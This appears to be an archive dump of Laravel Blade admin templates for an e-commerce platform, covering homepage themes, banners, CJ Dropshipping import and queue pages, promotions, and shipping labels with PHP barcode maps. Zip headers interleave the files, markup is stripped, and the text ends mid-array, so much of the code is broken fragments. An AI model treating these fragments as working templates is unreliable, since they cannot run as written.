    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 1370px width X 242px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 400px width X 200px height.") }}
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Flash Deal Section Settings") }}

    @csrf
    {{ translate("Minimum dimensions required: 1370px width X 360px height (If use a single banner).") }}
    @php $home_preorder_banner_1_images = get_setting('home_preorder_banner_1_images', null, $lang); $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp @if ($home_preorder_banner_1_images != null) @foreach (json_decode($home_preorder_banner_1_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-preorder_banner_1-target"> {{ translate('Add New') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Best Selling Products Section Settings") }}

    @csrf

    {{ translate("New Products Section Settings") }}

    ' data-target=".home-banner3-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf

    {{ translate("Section Settings") }}

    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 400px width X 475px height.") }}
    @endif @if(get_setting('coupon_system') == 1)
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 552px width X 322px height.') }}
    @php $cupon_text_color = get_setting('cupon_text_color'); @endphp
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf

    {{ translate("Section Settings") }}

    @php $home_categories = get_setting('home_categories'); @endphp @if ($home_categories != null) @php $categories = \App\Models\Category::where('parent_id', 0)->with('childrenCategories')->get(); @endphp @foreach (json_decode($home_categories, true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Section Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf

    {{ translate("Top Sellers Section Settings") }}

    @csrf

    {{ translate("Top Brands Section Settings") }}

    @endsection @section('script') @endsection PK�N]]ؠ�b�b�Eviews/backend/website_settings/pages/thecore/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Thecore)') }}

    {{-- --}}
    @csrf
    {{ translate('Minimum dimensions required: 554px width X 516px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @php $hero_bg_color = get_setting('hero_bg_color'); @endphp

    {{ translate("To set Hot Categories on the homepage, first enable them from the Category Listing page. Only the enabled categories will appear in the Hot Categories section.") }}
    {{ translate("Set Hot categories") }} {{ translate('Here') }}

    @csrf

    {{ translate("Best Selling Products Section Settings") }}

    @csrf
    @php $todays_deal_bg_color = get_setting('todays_deal_bg_color') @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 400px height.") }}
    @php $auction_product_bg_color = get_setting('auction_product_bg_color'); @endphp
    @php $auction_product_btn_color = get_setting('auction_product_btn_color'); @endphp
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @php $classified_bg_color = get_setting('classified_bg_color'); @endphp
    @endsection @section('script') @endsection PK�N]����0�0Bviews/backend/website_settings/pages/nexa/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Nexa)') }}

    @csrf
    {{ translate('Minimum dimensions required: 1920px width X 320px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $small_home_slider_images = get_setting('small_home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf
    @php $enable_flash_deal = get_setting('enable_flash_deal') @endphp
    {{ translate('Enable Flash Deal') }}
    @csrf
    @php $enable_todays_deal = get_setting('enable_todays_deal') @endphp
    {{ translate('Enable Todays Deal') }}
    @php $todays_deal_title_sub_text = get_setting('todays_deal_title_sub_text', null); @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    @php $enable_best_selling_products = get_setting('enable_best_selling_products') @endphp
    {{ translate('Enable Best Selling Products') }}
    @php $best_selling_products_title_sub_text = get_setting('best_selling_products_title_sub_text', null); @endphp
    @csrf
    @php $enable_categories = get_setting('enable_categories') @endphp
    {{ translate('Enable Categories') }}
    @php $savedMainCategories = json_decode(get_setting('main_categories'), true) ?? []; $savedChildCategories = json_decode(get_setting('child_categories'), true) ?? []; $allMainCategories = \App\Models\Category::where('parent_id', 0) ->with('childrenCategories') ->get(); @endphp
    @if (!empty($savedMainCategories)) @foreach ($savedMainCategories as $key => $mainId) @php $childIds = $savedChildCategories[$key] ?? []; @endphp
    @endforeach @endif
    @if(addon_is_activated('auction'))
    @csrf
    @php $enable_auction_products = get_setting('enable_auction_products') @endphp
    {{ translate('Enable Auction Products') }}
    @php $auction_title_sub_text = get_setting('auction_title_sub_text', null); @endphp
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 400px height.") }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Maximum dimensions required: 768px width X 200px height.") }}
    @endif
    @csrf
    @php $enable_classified_products = get_setting('enable_classified_products') @endphp
    {{ translate('Enable Classified Products') }}
    @php $classified_title_sub_text = get_setting('classified_title_sub_text', null); @endphp
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 400px height.") }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Maximum dimensions required: 768px width X 200px height.") }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    @csrf
    @php $enable_preorder_products = get_setting('enable_preorder_products') @endphp
    {{ translate('Enable Preorder Products') }}
    @php $preorder_title_sub_text = get_setting('preorder_title_sub_text', null); @endphp
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 400px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Maximum dimensions required: 768px width X 200px height.") }}
    @csrf
    @php $enable_shop_by_seller = get_setting('enable_shop_by_seller') @endphp
    {{ translate('Enable Shop By Sellers') }}
    @php $shop_by_seller_title_sub_text = get_setting('shop_by_seller_title_sub_text', null); @endphp
    @csrf
    @php $enable_shop_by_brand = get_setting('enable_shop_by_brand') @endphp
    {{ translate('Enable Shop By Brands') }}
    @php $shop_by_brand_title_sub_text = get_setting('shop_by_brand_title_sub_text', null); @endphp
    @endsection @section('script') @endsectionPK�N]� ����6views/backend/website_settings/select_header.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Select Header Layouts') }}
    @csrf
    @foreach ($element_types as $key => $element_type)
    id) checked @endif> header layout

    {{ $element_type->name }}

    @endforeach
    @endsection @section('script') @endsection PK�N]}�}K�(�(8views/backend/website_settings/select_homepage.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Select Homepage') }}

    {{-- --}}
    @csrf
    {{ translate('Homepage 1 - Classic') }} {{ translate('View') }}
    {{ translate('Homepage 2 - Metro') }} {{ translate('View') }}
    {{ translate('Homepage 3 - Minima') }} {{ translate('View') }}
    {{ translate('Homepage 4 - Megamart') }} {{ translate('View') }}
    {{ translate('Homepage 5 - Re-Classic') }} {{ translate('View') }}
    {{ translate('Homepage 6 - The-Core') }} {{ translate('View') }}
    {{ translate('Homepage 7 - Nexa') }} {{ translate('View') }}

    {{ translate('Configure your page layout') }}

    {{ translate('Each page contain different layout, choose one to bundle it in your Layout.') }}
    @endsection @section('modal')
    img-show
    @endsection @section('script') @endsection PK�N]5�i\��Dviews/backend/website_settings/topBanner/top_banner_create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Create New Top Bar') }}
    @csrf
    @endsection PK�N]O`J� � Bviews/backend/website_settings/topBanner/top_banner_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Top Bar Information') }}
    @csrf
    @endsection PK�N]7�3��$�$Bviews/backend/website_settings/topBanner/top_banner_list.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Top Bars') }}

    @can('top_banner_create') @endcan
    {{translate('All Top Bars')}}
    @canany(['top_banner_edit', 'top_banner_delete']) @endcanany @foreach ($topBanners as $key => $topBanner) @canany(['top_banner_edit', 'top_banner_delete']) @endcanany @endforeach
    # {{ translate('Text') }} {{ translate('Link') }} {{ translate('Status') }}{{ translate('Actions') }}
    {{ $key + 1 + ($topBanners->currentPage() - 1) * $topBanners->perPage() }} {{ $topBanner->getTranslation('text') }} {{ $topBanner->link}}
    {{ $topBanners->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsectionPK�N] }�*�)�)Eviews/backend/website_settings/topBanner/top_banner_setting.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Top Bar Settings') }}
    @csrf
    {{ translate('Show Full Width Top Bar') }}
    {{ translate('Minimum dimensions required: 1920px width X 40px height.') }}
    {{ translate('We have limited bar height to maintain UI. We had to crop from both top & bottom in view for different devices to make it responsive. Before designing bar keep these points in mind.') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endsection PK�N]�t%@XX<views/backend/website_settings/banners_and_sliders.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Banners & Sliders') }}
    @csrf
    generate Icon
    {{ translate('Will be shown in large device. Minimum dimensions required: 1370px width X 242px height.') }}
    generate Icon
    {{ translate('Will be shown in small device. Minimum dimensions required: 400px width X 184px height.') }}
    @endsection @section('script') @endsectionPK�N]�GV� u u2views/backend/website_settings/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Design Studio') }}

    {{ translate("Manage your site's look, layout and content") }}
    {{ translate('Layout & Navigation') }}
    @canany(['select_homepage', 'edit_website_page'])
    @endcanany @canany(['select_header', 'header_setup'])
    @endcanany @canany(['view_top_banner', 'top_banner_setting'])
    @endcanany @can('select_megamenu') @endcan @canany(['footer_setup', 'select_footer'])
    @endcanany
    @canany(['select_homepage', 'edit_website_page'])
    {{ translate('Homepage Settings') }}
    @endcanany @canany(['select_header', 'header_setup'])
    {{ translate('Header') }}
    @endcanany @canany(['view_top_banner', 'top_banner_setting'])
    {{ translate('Topbar') }}
    @endcanany @canany(['footer_setup', 'select_footer']) @endcanany
    {{ translate('Content & Pages') }}
    @can('banners_and_sliders') @endcan @can('view_all_website_pages') @endcan @can('authentication_layout_settings') @endcan
    {{ translate('Admin Panel') }}
    @can('can_manage_admin_panel') @endcan
    @endsection @section('script') @endsection PK�N]T�eo��9views/backend/website_settings/logo_and_favicon.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Logo & Favicon')}}

    @csrf
    generate Icon
    {{ translate('Will be used in admin panel side menu. Minimum dimensions required: 189px width X 31px height.') }}
    generate Icon
    {{ translate('Will be used in Admin login page, Seller login page & Delivery Boy login page. Minimum dimensions required: 189px width X 31px height.') }}
    @endsection @section('script') @endsectionPK�N]u����;views/backend/website_settings/manage_admin_panel.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Admin Navbar') }}
    @csrf
    @endsection @section('script') @endsectionPK�N]z���� � 6views/backend/website_settings/select_footer.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Select Footer Layouts') }}
    @csrf
    @endsection @section('script') @endsectionPK�N]�ꓚ  8views/backend/website_settings/select_megamenu.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Select Megamenu Layouts') }}
    @csrf
    @foreach ($element_types as $key => $element_type)
    id) checked @endif> megamenu layout

    {{ $element_type->name }}

    @endforeach
    @endsection @section('script') @endsectionPK�N]�X/�ss5views/backend/website_settings/system_setup.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('System Setup')}}

    @csrf
    {{ translate('"svg and gif" image will not be converted.') }}
    generate Icon
    {{ translate('Minimum dimensions required: 32px width X 32px height.') }}
    @endsection @section('script') @endsectionPK�N]#��M views/backend/cj/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('CJ Dropshipping Integration') }}

    @csrf
    {{ translate('Import Products') }}
    {{ translate('Mapped Products') }}

    {{ $stats['mapped_products'] }}

    {{ translate('Queued Orders') }}

    {{ $stats['queued_orders'] }}

    {{ translate('Submitted Orders') }}

    {{ $stats['submitted_orders'] }}

    {{ translate('Last Log') }}
    {{ optional($stats['last_log'])->created_at ?? '-' }}
    {{ translate('Settings') }}
    @csrf
    {{ translate('Fulfillment Queue') }} {{ translate('Sync Logs') }}
    @endsection PK�N]�rM�gg!views/backend/cj/import.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('CJ Product Import') }}

    {{ translate('Import by CJ Product IDs') }}
    @csrf
    {{ translate('Import from Raw JSON (manual fallback)') }}
    @csrf
    {{ translate('Recent CJ Product Mappings') }}
    @forelse($maps as $map) @empty @endforelse
    IDLocal ProductCJ ProductCJ VariantStatusSynced At
    {{ $map->id }} {{ $map->product_id }} {{ $map->cj_product_id }} {{ $map->cj_variant_id }} {{ $map->sync_status }} {{ $map->last_synced_at }}
    {{ translate('No mappings yet') }}
    @endsection PK�N]핶%jj views/backend/cj/queue.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('CJ Fulfillment Queue') }}

    @forelse($queue as $item) @empty @endforelse
    IDOrderDetailProductStatusCJ OrderErrorAction
    {{ $item->id }} {{ optional($item->order)->code ?? $item->order_id }} {{ $item->order_detail_id }} {{ optional($item->product)->name ?? $item->product_id }} {{ $item->submission_status }} {{ $item->cj_order_id ?? '-' }} {{ $item->error_message ? \Illuminate\Support\Str::limit($item->error_message, 100) : '-' }}
    @csrf
    {{ translate('No queued records') }}
    @endsection PK�N]�&��views/backend/cj/logs.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('CJ Sync Logs') }}

    @forelse($logs as $log) @empty @endforelse
    IDTypeStatusEntityMessageAttemptDate
    {{ $log->id }} {{ $log->log_type }} {{ $log->status }} {{ $log->entity_type }} #{{ $log->entity_id }} {{ \Illuminate\Support\Str::limit($log->message, 120) }} {{ $log->attempt }} {{ $log->created_at }}
    {{ translate('No logs available') }}
    @endsection PK�N]G˛0b%b%5views/backend/marketing_analytics/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @endsection PK�N] _0_06views/backend/promotion_and_offers/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Promotion & Offers') }}

    {{ translate('Create and manage all promotions, offers and discounted products from one place.') }}
    Bulhorn Icon
    {{translate('Promotional Products')}}
    {{translate('Select & Import products for active promotional channels in one place')}}
    {{$totalProducts}}
    {{translate('Total Products')}}
    {{$promotionalProducts}}
    {{translate('Assigned for Promotion')}}
    Category Wise Discount Icon
    {{translate('Category-Wise Discounts')}}
    {{translate('Apply automatic discounts to products based on their category')}}
    {{$all_categories}}
    {{translate('All Category')}}
    {{$main_categories}}
    {{translate('Main Category')}}
    Flash Icon
    {{translate('Flash Sale')}}
    {{translate('Create Campaign for limited time sale with countdown. Create Campaign for limited time sale with countdown.')}}
    {{ $totalFlashDeals }}
    {{translate('Total Campaign Created')}}
    {{ $activeFlashDeals }}
    {{translate('Campaign Active')}}
    Clock Icon
    {{translate("Today's Deal")}}
    {{translate('Handpick daily spotlight products with exclusive markdown prices')}}
    {{ $todaysDeal }}
    {{translate('Currently Featured in the deal')}}
    @if (get_setting('coupon_system') == 1 )
    Cupon Icon
    {{translate('Coupon')}}
    {{translate('Create coupon with codes for customers to use for discounts.')}}
    {{$totalCoupons}}
    {{translate('Total Coupon')}}
    {{$activeCoupons}}
    {{translate('Active Coupon')}}
    @endif
    @endsection @section('script') @endsectionPK�N]M�,�*�*3views/backend/promotion_and_offers/filter.blade.phpnu�[���
    @if (auth()->user()->can('product_delete')) @else @endif @forelse ($products as $key => $product) @empty @endforelse
    #{{ translate('Thumb') }} {{ translate('Name / Brand') }} {{ translate('Owner / Category') }} {{ translate('Ratings') }} {{ translate('Price Details') }} {{ translate('Todays Deal') }} {{ translate('Options') }}
    @if (auth()->user()->can('product_delete'))
    @else
    {{ $key + 1 + ($products->currentPage() - 1) * $products->perPage() }}
    @endif
    Image
    {{ $product->getTranslation('name') }} @if(isset($product->brand->name)) {{ translate($product->brand->name) }} @else {{ translate('No Brand') }} @endif
    @php $shop = optional(optional($product->user)->shop); @endphp {{ $shop->name ?? translate('Inhouse') }} {{ translate('Main Category') }}

    {{translate($product->main_category->name ?? '')}}

    {{ renderStarRatingLatest($product->rating) }}

    {{ $product->rating }}{{ translate('out of') }} 5.0

    @php $total = 0; $total += $product->reviews->where('status', 1)->count(); @endphp

    {{ $total }}{{translate('Reviews') }}

    {{ translate('Price') }}

    {{ single_price($product->unit_price) }}

    @if (discount_in_percentage($product) > 0)

    {{ translate('Discount') }} {{ discount_in_percentage($product) }}%

    @endif
    @if (!$product->draft) @endif
    {{ translate('No Products found!') }}
    PK�N]��<�^�^2views/backend/promotion_and_offers/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('Promotional Products') }}

    @if (auth()->user()->can('add_promotional_products')) {{ translate('Promotional Products') }} @endif
    @endsection @section('modal') @include('modals.loading_modal')
    @include('backend.promotion_and_offers.product_select_right_canvas')
    @endsection @section('script') @endsection PK�N]a�c�22<views/backend/promotion_and_offers/products_search.blade.phpnu�[���@if(count($products) > 0) @php $select_type = $single_select ? 'radio' : 'checkbox'; $name = $single_select ? 'selected_product_id' : 'selected_product_id[]'; $promotional = isset($promotional) ? $promotional : 0; $promotional_check = $promotional == 1 ? 1 : 0; @endphp @foreach ($products as $key => $product) promotional == 1) class="promotional-selected-tr" @endif> @endforeach
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]w�⚐ � Hviews/backend/promotion_and_offers/product_select_right_canvas.blade.phpnu�[���
    {{translate('Add Product In Promotional')}}
    PK�N]�\FMviews/backend/promotion_and_offers/todays_deal/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('Todays Deal Products') }}

    @if (auth()->user()->can('add_todays_deal_products')) {{ translate('Todays Deal Products') }} @endif
    @if($seller_type == 'seller')
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    @include('backend.promotion_and_offers.todays_deal.offcanvas')
    @endsection @section('script') @endsection PK�N]�"2C� � Bviews/backend/promotion_and_offers/todays_deal/offcanvas.blade.phpnu�[���
    {{translate('Add Product In Todays Deal')}}
    PK�N]Ȝ�u22Hviews/backend/promotion_and_offers/todays_deal/products_search.blade.phpnu�[���@if(count($products) > 0) @php $select_type = $single_select ? 'radio' : 'checkbox'; $name = $single_select ? 'selected_product_id' : 'selected_product_id[]'; $todays_deal = isset($todays_deal) ? $todays_deal : 0; $todays_deal_check = $todays_deal == 1 ? 1 : 0; @endphp @foreach ($products as $key => $product) todays_deal == 1) class="todays_deal-selected-tr" @endif> @endforeach
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]}�XXAviews/backend/shipping_labels/bulk_shipping_label_print.blade.phpnu�[��� @foreach ($orders as $order) @include($view, [ 'order' => $order, 'font_family' => $font_family, 'direction' => $direction, 'text_align' => $text_align, 'not_text_align' => $not_text_align, ]) @if (!$loop->last) @endif @endforeachPK�N]{��H�H6views/backend/shipping_labels/shipping_label.blade.phpnu�[��� Shipping Label - {{ $order->code }}
    @php $sl = json_decode(get_setting('shipping_label'), true) ?? []; $flds = $sl['fields'] ?? []; $btype = $sl['barcode_type'] ?? 'qrcode'; $bencode = $sl['barcode_encode'] ?? 'order_number'; $showTxt = $sl['show_human_readable_text_below_barcode'] ?? 0; $showQR = $sl['show_qr_code_alongside_barcode'] ?? 0; $logo = $sl['label_logo'] ?? null; $sender_name_and_address = $sl['sender_name_and_address'] ?? 0; $show_tracking_code = $flds['show_tracking_code'] ?? 0; $shipping = json_decode($order->shipping_address); if ($bencode == 'custom_value') $bval = $sl['custom_barcode_value'] ?? $order->code; elseif ($bencode == 'tracking_code') $bval = $order->tracking_code; else $bval = $order->code; $sender_name = $order->shop->name ?? get_setting('site_name'); $removedXML = ''; $code39map = [ '0'=>'101001101101','1'=>'110100101011','2'=>'101100101011', '3'=>'110110010101','4'=>'101001101011','5'=>'110100110101', '6'=>'101100110101','7'=>'101001011011','8'=>'110100101101', '9'=>'101100101101','A'=>'110101001011','B'=>'101101001011', 'C'=>'110110100101','D'=>'101011001011','E'=>'110101100101', 'F'=>'101101100101','G'=>'101010011011','H'=>'110101001101', 'I'=>'101101001101','J'=>'101011001101','K'=>'110101010011', 'L'=>'101101010011','M'=>'110110101001','N'=>'101011010011', 'O'=>'110101101001','P'=>'101101101001','Q'=>'101010110011', 'R'=>'110101011001','S'=>'101101011001','T'=>'101011011001', 'U'=>'110010101011','V'=>'100110101011','W'=>'110011010101', 'X'=>'100101101011','Y'=>'110010110101','Z'=>'100110110101', '-'=>'100101011011','.'=>'110010101101',' '=>'100110101101', '$'=>'100100100101','/'=>'100100101001','+'=>'100101001001', '%'=>'101001001001','*'=>'100101101101', ]; $c128map = [ ' '=>'212222','!'=>'222122','"'=>'222221','#'=>'121223','$'=>'121322', '%'=>'131222','&'=>'122213',"'"=>'122312','('=>'132212',')'=>'221213', '*'=>'221312','+'=>'231212',','=>'112232','-'=>'122132','.'=>'122231', '/'=>'113222','0'=>'123122','1'=>'123221','2'=>'223211','3'=>'221132', '4'=>'221231','5'=>'213212','6'=>'223112','7'=>'312131','8'=>'311222', '9'=>'321122',':'=>'321221',';'=>'312212','<'=>'322112','='=>'322211', '>'=>'212123','?'=>'212321','@'=>'232121','A'=>'111323','B'=>'131123', 'C'=>'131321','D'=>'112313','E'=>'132113','F'=>'132311','G'=>'211313', 'H'=>'231113','I'=>'231311','J'=>'112133','K'=>'112331','L'=>'132131', 'M'=>'113123','N'=>'113321','O'=>'133121','P'=>'313121','Q'=>'211331', 'R'=>'231131','S'=>'213113','T'=>'213311','U'=>'213131','V'=>'311123', 'W'=>'311321','X'=>'331121','Y'=>'312113','Z'=>'312311','['=>'332111', '\\'=>'314111',']'=>'221411','^'=>'431111','_'=>'111224','`'=>'111422', 'a'=>'121124','b'=>'121421','c'=>'141122','d'=>'141221','e'=>'112214', 'f'=>'112412','g'=>'122114','h'=>'122411','i'=>'142112','j'=>'142211', 'k'=>'241211','l'=>'221114','m'=>'413111','n'=>'241112','o'=>'134111', 'p'=>'111242','q'=>'121142','r'=>'121241','s'=>'114212','t'=>'124112', 'u'=>'124211','v'=>'411212','w'=>'421112','x'=>'421211','y'=>'212141', 'z'=>'214121','{'=>'412121','|'=>'111143','}'=>'111341','~'=>'131141', ]; $makeSvg = function(string $value, string $type) use ($code39map, $c128map): string { $h = 100; $quiet = 8; $u = 2; $v = strtoupper($value); if ($type === 'code39') { $encoded = '*' . $v . '*'; $bars = []; $x = $quiet; foreach (str_split($encoded) as $ci => $ch) { if (!isset($code39map[$ch])) continue; if ($ci > 0) $x += $u; foreach (str_split($code39map[$ch]) as $bi => $bit) { $w = ($bit === '1') ? $u * 2 + 1 : $u; if ($bi % 2 === 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; } } $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } if ($type === 'code128') { $bars = []; $x = $quiet; $isBar = true; $dp = function(string $pat) use (&$bars, &$x, &$isBar, $u, $h) { foreach (str_split($pat) as $d) { $w = (int)$d * $u; if ($isBar && $w > 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; $isBar = !$isBar; } }; $dp('2114'); $ck = 104; foreach (str_split($value) as $idx => $ch) { $ck += ($idx + 1) * (ord($ch) - 32); if (isset($c128map[$ch])) $dp($c128map[$ch]); } $ck %= 103; $cc = chr($ck + 32); if (isset($c128map[$cc])) $dp($c128map[$cc]); $dp('2331112'); $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } return "{$value}"; }; @endphp
    @if($logo) logo @else logo @endif
    {{ get_setting('site_name') }}
    @if(!empty($flds['order_number']))
    ORDER ID: {{ $order->code }}
    @endif
    @if($btype === 'qrcode') {!! str_replace($removedXML, '', QrCode::size(90)->generate($bval)) !!} @else {!! $makeSvg($bval, $btype) !!} @endif @if($showTxt)
    {{ $bval }}
    @endif
    @if($showQR && $btype !== 'qrcode') @endif
    {!! str_replace($removedXML, '', QrCode::size(68)->generate($bval)) !!}
    @if(!empty($flds['order_number'])) @endif @if($order->shipping_type) @endif @if(!empty($flds['sender_name_and_address'])) @endif
    INVOICE : {{ $order->code }}
    D. Type : @if($order->shipping_type == 'home_delivery') Home @elseif($order->shipping_type == 'pickup_point') Pickup @elseif($order->shipping_type == 'carrier') {{ $order->carrier->name ?? 'Carrier' }} @else N/A @endif
    From : {{ $sender_name }}
    Address : {{ get_seller_address($order) }}
    @if(!empty($flds['receiver_name_and_address']))
    {{ $shipping->name }}
    @if(!empty($shipping->phone))
    {{ translate('Phone') }}: {{ $shipping->phone }}
    @endif
    {{ translate('Address') }}: {{ $shipping->address ? $shipping->address.', ' : '' }}{{ $shipping->city ? $shipping->city.', ' : '' }}{{ !empty($shipping->state) ? $shipping->state.', ' : '' }}{{ $shipping->postal_code ?? '' }}{{ $shipping->country ? ', '.$shipping->country : '' }}
    @endif @if(!empty($flds['cod_amount']))
    @if($order->payment_type == 'cash_on_delivery') @else @endif
    COD {{ single_price($order->grand_total) }} PAID
    @endif
    @if(!empty($flds['custom_footer_text']) && !empty($sl['custom_footer_text']))
    @endif
    PK�N]Lm� H H;views/backend/shipping_labels/shipping_label_mini.blade.phpnu�[��� Shipping Label - {{ $order->code }}
    @php $sl = json_decode(get_setting('shipping_label'), true) ?? []; $flds = $sl['fields'] ?? []; $btype = $sl['barcode_type'] ?? 'qrcode'; $bencode = $sl['barcode_encode'] ?? 'order_number'; $showTxt = $sl['show_human_readable_text_below_barcode'] ?? 0; $showQR = $sl['show_qr_code_alongside_barcode'] ?? 0; $logo = $sl['label_logo'] ?? null; $sender_name_and_address = $sl['sender_name_and_address'] ?? 0; $show_tracking_code = $flds['show_tracking_code'] ?? 0; $shipping = json_decode($order->shipping_address); if ($bencode == 'custom_value') $bval = $sl['custom_barcode_value'] ?? $order->code; elseif ($bencode == 'tracking_code') $bval = $order->tracking_code; else $bval = $order->code; $sender_name = $order->shop->name ?? get_setting('site_name'); $removedXML = ''; $code39map = [ '0'=>'101001101101','1'=>'110100101011','2'=>'101100101011', '3'=>'110110010101','4'=>'101001101011','5'=>'110100110101', '6'=>'101100110101','7'=>'101001011011','8'=>'110100101101', '9'=>'101100101101','A'=>'110101001011','B'=>'101101001011', 'C'=>'110110100101','D'=>'101011001011','E'=>'110101100101', 'F'=>'101101100101','G'=>'101010011011','H'=>'110101001101', 'I'=>'101101001101','J'=>'101011001101','K'=>'110101010011', 'L'=>'101101010011','M'=>'110110101001','N'=>'101011010011', 'O'=>'110101101001','P'=>'101101101001','Q'=>'101010110011', 'R'=>'110101011001','S'=>'101101011001','T'=>'101011011001', 'U'=>'110010101011','V'=>'100110101011','W'=>'110011010101', 'X'=>'100101101011','Y'=>'110010110101','Z'=>'100110110101', '-'=>'100101011011','.'=>'110010101101',' '=>'100110101101', '$'=>'100100100101','/'=>'100100101001','+'=>'100101001001', '%'=>'101001001001','*'=>'100101101101', ]; $c128map = [ ' '=>'212222','!'=>'222122','"'=>'222221','#'=>'121223','$'=>'121322', '%'=>'131222','&'=>'122213',"'"=>'122312','('=>'132212',')'=>'221213', 